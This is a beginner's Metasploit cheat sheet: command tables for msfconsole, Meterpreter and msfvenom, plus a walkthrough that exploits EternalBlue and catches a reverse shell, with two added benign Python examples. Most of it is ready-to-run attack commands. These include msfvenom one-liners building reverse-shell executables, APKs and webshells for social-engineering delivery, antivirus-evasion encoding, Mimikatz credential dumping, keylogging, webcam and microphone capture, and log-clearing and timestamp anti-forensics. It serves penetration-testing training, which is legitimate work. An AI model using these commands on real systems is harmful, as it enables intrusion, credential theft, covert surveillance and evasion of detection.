Your complete beginner's reference for the world's most widely used penetration testing framework.
The Metasploit Framework (MSF) is an open-source penetration testing platform created by H.D. Moore in 2003 and acquired by Rapid7 in 2009. It's the industry standard tool for developing, testing, and executing exploits against remote targets.
Metasploit provides a unified interface to thousands of exploits, payloads, scanners, and post-exploitation tools. Whether you're a beginner or an experienced red teamer, Metasploit dramatically speeds up the penetration testing process.
Exploit: Code that takes advantage of a specific vulnerability in software or hardware to gain access.
Payload: Code delivered and executed on the target after a successful exploit, e.g. a shell or Meterpreter session.
Auxiliary: Modules for scanning, fuzzing, sniffing, and information gathering; no payload needed.
Post: Post-exploitation modules run after access is gained, for privilege escalation, persistence, and data exfiltration.
Encoder: Transforms payloads to evade antivirus and IDS detection.
Meterpreter: An advanced, in-memory payload providing a powerful interactive shell with built-in capabilities.
Every Metasploit engagement follows this fundamental pattern:
Launch the console with msfconsole -q. The -q flag skips the ASCII art banner and launches faster.
Every msfconsole command, option, and module type.

Core console commands

| Command | Description |
|---|---|
| help / ? | Show all available commands |
| help <command> | Get help on a specific command |
| version | Display Metasploit version |
| banner | Display a random Metasploit banner |
| connect <host> <port> | Connect to a host (like netcat) |
| exit / quit | Exit msfconsole |
| history | Show command history |
| makerc <file> | Save command history to a resource file |
| resource <file.rc> | Execute commands from a resource script file |
| spool <file> | Log all console output to a file |
| reload_all | Reload all modules from disk |
| load <plugin> | Load a Metasploit plugin (e.g., load kiwi) |
| unload <plugin> | Unload a loaded plugin |

Searching, selecting and running modules

| Command | Description |
|---|---|
| search <term> | Search all modules by name, CVE, platform, type, etc. |
| search type:exploit platform:windows | Filter search by type and platform |
| search cve:2017-0144 | Search by CVE number |
| use <module path> | Select a module to use |
| use <number> | Select module by search result number |
| info | Show full module info: description, options, references |
| info <module path> | Show info for a module without selecting it |
| show options | Show configurable options for current module |
| show advanced | Show advanced module options |
| show payloads | Show compatible payloads for current exploit |
| show targets | Show exploit targets (OS versions, service versions) |
| show exploits | List all exploit modules |
| show auxiliary | List all auxiliary modules |
| show post | List all post-exploitation modules |
| show encoders | List all encoder modules |
| back | Exit current module, return to main prompt |
| previous | Go back to previously selected module |
| check | Check if target is vulnerable (not all modules support this) |
| run / exploit | Execute the current module |
| run -j | Run module as a background job |
| run -z | Run and immediately background new sessions |

Setting module options

| Command | Description |
|---|---|
| set <OPTION> <value> | Set an option for the current module |
| set RHOSTS 192.168.1.100 | Set the target host(s) |
| set RHOSTS 192.168.1.0/24 | Set target as a subnet |
| set LHOST 192.168.1.10 | Set your attacker IP (for reverse payloads) |
| set LPORT 4444 | Set your listener port |
| set PAYLOAD windows/meterpreter/reverse_tcp | Select a payload |
| set TARGET 0 | Select an exploit target by index |
| set VERBOSE true | Enable verbose output |
| setg <OPTION> <value> | Set option globally (persists across modules) |
| setg LHOST 192.168.1.10 | Set LHOST globally once for entire session |
| unset <OPTION> | Unset a specific option |
| unset all | Unset all options for current module |
| unsetg <OPTION> | Unset a global option |
| get <OPTION> | Show the current value of an option |
| save | Save current settings to configuration file |

Session management

| Command | Description |
|---|---|
| sessions | List all active sessions |
| sessions -l | List sessions (verbose) |
| sessions -i <id> | Interact with / attach to a session |
| sessions -k <id> | Kill (terminate) a session |
| sessions -K | Kill all active sessions |
| sessions -u <id> | Upgrade shell session to Meterpreter |
| sessions -c <cmd> | Run a command on all sessions |
| Ctrl+Z | Background current session, return to msfconsole |
| background | Background current Meterpreter session |

Database and workspace commands

| Command | Description |
|---|---|
| db_status | Check if database is connected |
| workspace | List all workspaces |
| workspace -a <name> | Create a new workspace |
| workspace -d <name> | Delete a workspace |
| workspace <name> | Switch to a workspace |
| db_nmap <options> <target> | Run nmap and store results in the database |
| db_nmap -sV -O 192.168.1.0/24 | Example: version and OS scan stored to DB |
| hosts | List all discovered hosts in current workspace |
| hosts -R | Set RHOSTS to all hosts in the database |
| services | List all discovered services |
| services -p 80,443 | Filter services by port number |
| vulns | List all detected vulnerabilities |
| creds | List all captured credentials |
| notes | List notes from the database |
| db_export -f xml out.xml | Export database to XML file |
| db_import <file> | Import scan results (Nmap XML, Nessus, etc.) |
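
As an added example, not code from this page or from Metasploit, the following Python parses the Nmap XML that db_import reads into the host and service records that the hosts and services commands list, and reproduces the services -p and hosts -R filters. The XML sample is constructed, and skipping hosts reported down and ports that are not open is my assumption about how db_import behaves.

```python
import xml.etree.ElementTree as ET

# Constructed sample of the Nmap XML that db_import reads; not a real scan.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -O 192.168.1.0/24">
<host><status state="up"/><address addr="192.168.1.100" addrtype="ipv4"/><ports>
 <port protocol="tcp" portid="445"><state state="open"/>
  <service name="microsoft-ds" product="Windows 7 microsoft-ds"/></port>
 <port protocol="tcp" portid="80"><state state="open"/>
  <service name="http" product="Apache httpd" version="2.4.7"/></port>
 <port protocol="tcp" portid="23"><state state="closed"/><service name="telnet"/></port>
</ports></host>
<host><status state="down"/><address addr="192.168.1.101" addrtype="ipv4"/></host>
<host><status state="up"/><address addr="192.168.1.102" addrtype="ipv4"/><ports>
 <port protocol="tcp" portid="443"><state state="open"/><service name="https"/></port>
</ports></host>
</nmaprun>"""

def import_nmap_xml(xml_text):
    """Model of db_import (assumption: hosts reported down and ports that are
    not open are skipped). Returns (hosts, services); each service dict carries
    the columns the services command prints: host, port, proto, name, info."""
    root = ET.fromstring(xml_text)
    hosts, services = [], []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # nmap marked the host down: nothing to record
        addr = host.find("address[@addrtype='ipv4']").get("addr")
        hosts.append(addr)
        for port in host.findall("ports/port"):
            if port.find("state").get("state") != "open":
                continue  # closed/filtered ports are not services
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            # the info column is nmap's product and version joined together
            parts = [svc.get("product"), svc.get("version")] if svc is not None else []
            services.append({"host": addr, "port": int(port.get("portid")),
                             "proto": port.get("protocol"), "name": name,
                             "info": " ".join(p for p in parts if p)})
    return hosts, services

def services_by_port(services, ports):
    """Equivalent of 'services -p 80,443': keep only the listed ports."""
    wanted = {int(p) for p in ports.split(",")}
    return [s for s in services if s["port"] in wanted]

def rhosts_from_db(hosts):
    """Equivalent of 'hosts -R': RHOSTS becomes every host in the workspace."""
    return " ".join(hosts)
```
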

Jobs and routing

| Command | Description |
|---|---|
| jobs | List all running background jobs |
| jobs -l | List jobs (verbose) |
| kill <job_id> | Kill a specific background job by ID |
| jobs -K | Kill all running jobs |
| route | View and manage routes for pivoting |
| route add <subnet> <session> | Route traffic through a session (pivoting) |
| route flush | Remove all routes |

Commonly used modules

| Task | Commands |
|---|---|
| EternalBlue (MS17-010) exploit | use exploit/windows/smb/ms17_010_eternalblue |
| SMB vulnerability check (scanner) | use auxiliary/scanner/smb/smb_ms17_010 |
| Port scan via Metasploit | use auxiliary/scanner/portscan/tcp |
| SSH brute force | use auxiliary/scanner/ssh/ssh_login |
| Catch reverse shell | use exploit/multi/handler |
| Local privilege escalation suggester | use post/multi/recon/local_exploit_suggester |
| Hash dumping (Windows) | use post/windows/gather/hashdump |
| List smb shares | use auxiliary/scanner/smb/smb_enumshares |
| HTTP directory scan | use auxiliary/scanner/http/dir_scanner |
| SNMP enumeration | use auxiliary/scanner/snmp/snmp_enum |

Step-by-step walkthroughs for beginners, from launching msfconsole to post-exploitation.

1. Initialise the database: msfdb init
   Metasploit uses PostgreSQL to store scan results, credentials, and session data. This creates the database schema. Only needed once. Verify with db_status inside msfconsole.
2. Launch the console: msfconsole -q
   You'll see the msf6 > prompt. The -q flag skips the banner for faster startup.
3. Check the database connection: db_status
   Should show: postgresql connected to msf
4. Create a workspace for the engagement: workspace -a <name>
   Workspaces keep different engagements separate in the database.
5. Select a module: use exploit/windows/smb/ms17_010_eternalblue
   Or use the number shown in search results: use 0
   Your prompt changes to: msf6 exploit(windows/smb/ms17_010_eternalblue) >
6. Read the module details: info
   Shows: description, author, CVE references, available targets, required options, and notes on reliability.
7. List the options: show options
   Look for options marked Required: yes; these must be set before running.
8. Scan the network straight into the database: db_nmap -sV -O 192.168.1.0/24
   All nmap flags work with db_nmap. Results go straight into the Metasploit database.
9. Target every discovered host: hosts -R
   This automatically populates RHOSTS with all hosts in the database, which is great for scanning multiple targets at once.
10. Set the remaining options (set LHOST <your IP>, set PAYLOAD <payload>) and review them again with show options.
   Check all Required options are set. Double-check LHOST is your actual IP address.
11. Run the exploit: exploit
   On success you'll see: Meterpreter session 1 opened and your prompt becomes meterpreter >
12. Catch a reverse shell instead: use exploit/multi/handler
   This module catches incoming connections from payloads; it doesn't attack anything, it listens.
   set PAYLOAD windows/meterpreter/reverse_tcp : the payload here MUST match the payload embedded in your malicious file/link.
   set LHOST 0.0.0.0 : 0.0.0.0 listens on all interfaces; use your specific IP if needed.
   exploit -j : running as a job lets you continue using msfconsole while waiting for connections.
13. Escalate privileges inside Meterpreter: getsystem
   Tries multiple techniques to escalate to SYSTEM. Run getuid afterwards to verify.
14. Dump password hashes: hashdump
   Dumps local account hashes in format: user:RID:LM_hash:NTLM_hash. Requires SYSTEM.
15. Stabilise the session: ps, then migrate <pid>
   Migrate your Meterpreter into a stable process like explorer.exe or svchost.exe to avoid losing your session.
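
As an added example, not part of this page or of Metasploit, the following Python parses the hashdump line format described above (user:RID:LM_hash:NTLM_hash, with the trailing ":::" the tool prints) and applies the checks a reviewer runs on such a dump: blank passwords, legacy LM hashes still being stored, and one NT hash shared by several accounts. The dump text is a constructed sample whose non-empty hashes are arbitrary hex; the empty-password LM and NT constants are the standard values.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password (LM storage off)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
HASH_LINE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32})(?::::)?$")

# Constructed sample in hashdump's output format; the non-empty hashes are
# made-up hex values, and the last line is the kind of status text hashdump prints.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy:1002:fedcba9876543210fedcba9876543210:abcdef0123456789abcdef0123456789:::
[*] Dumping password hashes...
"""

def parse_hashdump(text):
    """Parse hashdump output into dicts; lines that are not hash records
    (status messages, blank lines) are skipped rather than raising."""
    records = []
    for line in text.splitlines():
        m = HASH_LINE.match(line.strip())
        if not m:
            continue
        user, rid, lm, nt = m.groups()
        records.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return records

def audit_hashes(records):
    """Defensive checks on a dump: accounts with a blank password, accounts whose
    LM hash is still stored, and the same NT hash reused across accounts."""
    by_nt = defaultdict(list)
    for r in records:
        by_nt[r["nt"]].append(r["user"])
    return {
        "blank_password": [r["user"] for r in records if r["nt"] == EMPTY_NT],
        "lm_hash_stored": [r["user"] for r in records if r["lm"] != EMPTY_LM],
        "shared_password": {nt: users for nt, users in by_nt.items()
                            if len(users) > 1 and nt != EMPTY_NT},
    }
```
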
The complete Metasploit methodology for a penetration test, from setup to reporting.

1. Setup: Define the scope, start your database, and create a workspace for the engagement.
2. Reconnaissance: Discover hosts, open ports, and services. Store results directly in the Metasploit database.
3. Vulnerability scanning: Run targeted auxiliary scanners to find exploitable vulnerabilities.
4. Exploitation: Select an exploit, configure options, and gain access. Start with the most impactful, least noisy attack.
5. Post-exploitation: Once inside, gather intelligence, escalate privileges, and pivot to other systems.
6. Pivoting: Use a compromised host as a stepping stone into internal, unreachable networks.
7. Reporting: Export your findings, clean up artifacts, and prepare your report.
Complete command reference for Metasploit's advanced post-exploitation shell.
Ctrl+Z or type background to return to msfconsole without killing the session.

System and process commands

| Command | Description |
|---|---|
| sysinfo | OS, hostname, architecture, Meterpreter type |
| getuid | Current user context (e.g., NT AUTHORITY\SYSTEM) |
| getpid | Current process ID |
| ps | List all running processes |
| migrate <pid> | Migrate Meterpreter into another process |
| shell | Drop into an interactive system shell (cmd.exe / bash) |
| execute -f cmd.exe -i | Execute a program interactively |
| kill <pid> | Kill a process by ID |
| idletime | Seconds since user last interacted with the system |
| env | Show environment variables |
| clearev | Clear Windows event logs (Application, System, Security) |

File system commands

| Command | Description |
|---|---|
| pwd | Print current remote directory |
| ls / dir | List files in current directory |
| cd <path> | Change remote directory |
| cat <file> | Display file contents |
| edit <file> | Open file in editor |
| upload <local> <remote> | Upload file to target |
| download <remote> <local> | Download file from target |
| rm <file> | Delete a file |
| mkdir <dir> | Create directory |
| search -f *.txt -d C:\\ | Search for files by pattern recursively |
| search -f password* -d C:\\Users | Search for password files |
| timestomp <file> -m "01/01/2020 00:00:00" | Modify file timestamps (anti-forensics) |

Networking commands

| Command | Description |
|---|---|
| ipconfig / ifconfig | Show network interfaces |
| arp | Display ARP cache (other hosts on LAN) |
| netstat | Show active connections |
| route | Show routing table |
| portfwd add -l 3389 -r 10.10.10.5 -p 3389 | Forward attacker port to internal target port |
| portfwd list | List active port forwards |
| portfwd flush | Remove all port forwards |

Privilege escalation

| Command | Description |
|---|---|
| getsystem | Attempt multiple auto-privilege escalation techniques |
| getsystem -t 1 | Technique 1: Named Pipe Impersonation (in memory); 2: Named Pipe (dropper); 3: Token Duplication |
| getuid | Verify current privilege level after escalation |
| use post/multi/recon/local_exploit_suggester | Find applicable local privilege escalation exploits |
| use post/windows/escalate/getsystem | Post module for getsystem |
| load incognito | Load incognito plugin for token impersonation |
| list_tokens -u | List available user tokens (incognito) |
| impersonate_token "NT AUTHORITY\\SYSTEM" | Impersonate a token (incognito) |

Credential harvesting

| Command | Description |
|---|---|
| hashdump | Dump local SAM hashes (requires SYSTEM) |
| run post/windows/gather/hashdump | Alternative hash dump via post module |
| load kiwi | Load Kiwi (Mimikatz) extension |
| creds_all | Dump all credentials using Kiwi |
| lsa_dump_sam | Dump SAM database with Kiwi |
| lsa_dump_secrets | Dump LSA secrets with Kiwi |
| wifi_list | List saved Wi-Fi networks and passwords |
| run post/windows/gather/credentials/credential_collector | Collect various stored credentials |

Screen, keyboard, webcam and microphone capture

| Command | Description |
|---|---|
| screenshot | Take a screenshot of the target's desktop |
| screenshare | Watch the target's desktop in real-time |
| keyscan_start | Start keylogger |
| keyscan_dump | Dump captured keystrokes |
| keyscan_stop | Stop keylogger |
| webcam_list | List available webcams |
| webcam_snap | Take a photo from the webcam |
| webcam_stream | Stream webcam to browser |
| record_mic | Record audio from microphone |

Pivoting

| Command / Usage | Description |
|---|---|
| background | Background session, return to msfconsole |
| route add 10.10.10.0/24 1 | Route traffic through session 1 to internal subnet |
| route print | Show current routing table |
| portfwd add -l 3389 -r 10.10.10.5 -p 3389 | Forward RDP from internal host to attacker |
| use auxiliary/server/socks_proxy | Set up SOCKS5 proxy through compromised host |
Generate standalone payloads for delivery via email, web, USB, or social engineering.

| Platform | Command |
|---|---|
| Windows EXE | msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o shell.exe |
| Windows EXE (x64) | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o shell64.exe |
| Linux ELF | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o shell.elf |
| Linux ELF (x64) | msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o shell64.elf |
| macOS (x64 Intel) | msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f macho -o shell.macho |
| Android APK | msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -o shell.apk |
| PHP webshell | msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f raw -o shell.php |
| Python script | msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f raw -o shell.py |
| PowerShell | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f psh -o shell.ps1 |
| ASP webshell | msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f asp -o shell.asp |
| WAR (Java server) | msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f war -o shell.war |

msfvenom listing, encoding and output options

| Command | Description |
|---|---|
| msfvenom -l encoders | List all available encoders |
| msfvenom -l payloads | List all payloads |
| msfvenom -l formats | List all output formats |
| -e x86/shikata_ga_nai -i 5 | Encode with shikata_ga_nai, 5 iterations |
| -e x64/xor_dynamic -i 3 | XOR encoder for 64-bit payloads |
| --platform windows --arch x86 | Specify platform and architecture explicitly |
| -b "\x00\x0a\x0d" | Avoid bad characters in shellcode |
| -n 200 | Prepend N NOP sled bytes |

Always set up a listener before delivering a payload. Generated payloads connect back to your LHOST:LPORT.